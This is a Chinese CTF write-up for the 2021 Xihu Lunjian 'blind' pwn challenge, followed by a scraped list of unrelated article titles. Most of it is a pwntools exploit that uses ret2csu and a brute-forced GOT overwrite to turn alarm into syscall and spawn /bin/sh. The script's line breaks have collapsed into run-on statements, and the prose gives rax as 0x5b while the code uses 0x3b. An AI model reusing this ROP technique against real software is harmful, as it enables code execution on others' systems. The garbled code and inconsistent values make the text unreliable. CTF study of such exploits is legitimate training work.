利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。

通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0)

exp

#/usr/env/bin python
from pwn import *
import timecontext.log_level = "debug"gadget1 = 0x4007ba
gadget2 = 0x4007a0elf = ELF('./blind')
read_got = elf.got['read']
read_plt = elf.plt['read']
alarm_plt = elf.plt['alarm']
alarm_got = elf.got['alarm']
bss_addr = elf.bss()i = 1def exp(off):payload = 'a' * 0x58payload += p64(gadget1)payload += p64(0) + p64(1) + p64(read_got)payload += p64(1) + p64(alarm_got) + p64(0)payload += p64(gadget2)payload += p64(gadget1)payload += p64(0) + p64(1) + p64(read_got)payload += p64(0x3b) + p64(bss_addr) + p64(0)payload += p64(gadget2)payload += p64(gadget1)payload += p64(0) + p64(1) + p64(alarm_got)payload += p64(0) + p64(0) + p64(bss_addr)payload += p64(gadget2)payload = payload.ljust(0x500, '\x00')payload += p8(off)payload += "/bin/sh\x00" + 'a' * (0x3b - 8)#gdb.attach(r)#pause()r.send(payload)sleep(1)r.sendline("echo hello!")s = r.recv(10)print sif "hello" in s:r.sendline("ls")r.sendline("cat flag")r.interactive()else:returni = 20
while True:try:global rr = process("./blind")i += 1exp(i)print iexcept:r.close()print 'trying...'

2021 西湖论剑 pwn blind相关推荐

  1. 2021西湖论剑wp

    web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test ...

  2. WP-2021西湖论剑

    2021西湖论剑-wp 前言 全靠大佬打,我是划水的. 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FI ...

  3. 2022西湖论剑-初赛CTF部分wp-Zodiac

    2022西湖论剑-初赛CTF部分wp-Zodiac 文章目录 2022西湖论剑-初赛CTF部分wp-Zodiac WEB real_ez_node 扭转乾坤 Node Magical Login PW ...

  4. 2023西湖论剑wirteup

    2023西湖论剑wirteup 文章目录 2023西湖论剑wirteup 机你太美 take_the_zip_easy mp3 Isolated Machine Memory Analysis 前言: ...

  5. 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代...

    2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...

  6. 2019西湖论剑·网络安全大会开幕 安全赋能数字新时代

    2019年4月20日-21日,以"安全:赋能数字新时代"为主题的2019西湖论剑•网络安全大会(以下简称"西湖论剑")在杭州国际博览中心举行.西湖论剑自2012 ...

  7. 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑...

    近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...

  8. 远禾科技出席阿里ASRC生态大会 并参与安恒西湖论剑

    近日,由阿里安全响应中心举办的2019 ASRC生态大会与安恒承办的2019西湖论剑·网络安全大会在互联网之都杭州成功召开,作为网络安全行业的两大盛会,得到了协会领导.业界权威.行业大咖.领导品牌.企 ...

  9. 2023西湖论剑——misc——MP3

    西湖论剑--misc--MP3 附件下载 链接:https://pan.baidu.com/s/1A-QFz3qC4Q2mSdZKBYqZNw 提取码:lulu MP3详解 这个应该是2023年这一届 ...

最新文章

  1. SpringBoot中的SFL4J日志
  2. property装饰器
  3. ajax如何知道超时请求,如何发送ajax请求来检查会话超时并在grails中呈现relogin消息?...
  4. 人脸变形算法——MLS
  5. “捆绑”住用户,需要优秀的产品(经验分享)
  6. fixed 语句(C# 参考)
  7. 信息学奥赛一本通(1405:质数的和与积)
  8. Delphi unit单元文件结构
  9. 最长重复子串_3. 无重复字符的最长子串
  10. Android APP推广流程
  11. Matlab并行编程
  12. 使用easywechat给关注公众号用户发消息
  13. Java导出Excel提示文件损坏_导出Gridview到Excel成功但文件已损坏?
  14. win7一直安装并更新计算机,win7系统更新时一直正在等待安装重启不更新的恢复方案...
  15. 前端开发问题及解决方案
  16. Mysql 5.5.8 安装手册
  17. 西北乱跑娃 --- python类方法重写
  18. 百趣代谢组学分享:从SWATH到MRM:一种新型高覆盖度靶向代谢组学技术
  19. Cause: java.sql.SQLException: Java heap space
  20. No qualifying bean of type ‘xxx‘的问题解决方案

热门文章

  1. 没有SOA,CIO 将面临什么
  2. 个人对粗糙集的一些理解和简单举例
  3. 磐石云服务器_磐石云双十二高防ip、海外服务器限量1元秒杀
  4. 汉仪尚巍手书有版权吗_汉仪尚巍手书字体下载 汉仪尚巍手书体W字体免费版下载...
  5. 奇偶 ASCII 值判断(信息学奥赛一本通)
  6. Spring 框架远程代码执行漏洞(CVE-2022-22965)
  7. 一篇文章带你学会 Spring 中的 JdbcTemplate 增删改查操作
  8. 校园二手书pro(微信小程序运营版)
  9. 邮件接收中Postfix、Dovecot、Squirrelmail、MySQL、AMaVis、Clam AntiVirus和SpamAssasin的功能解析
  10. 搜一下导航完整程序源码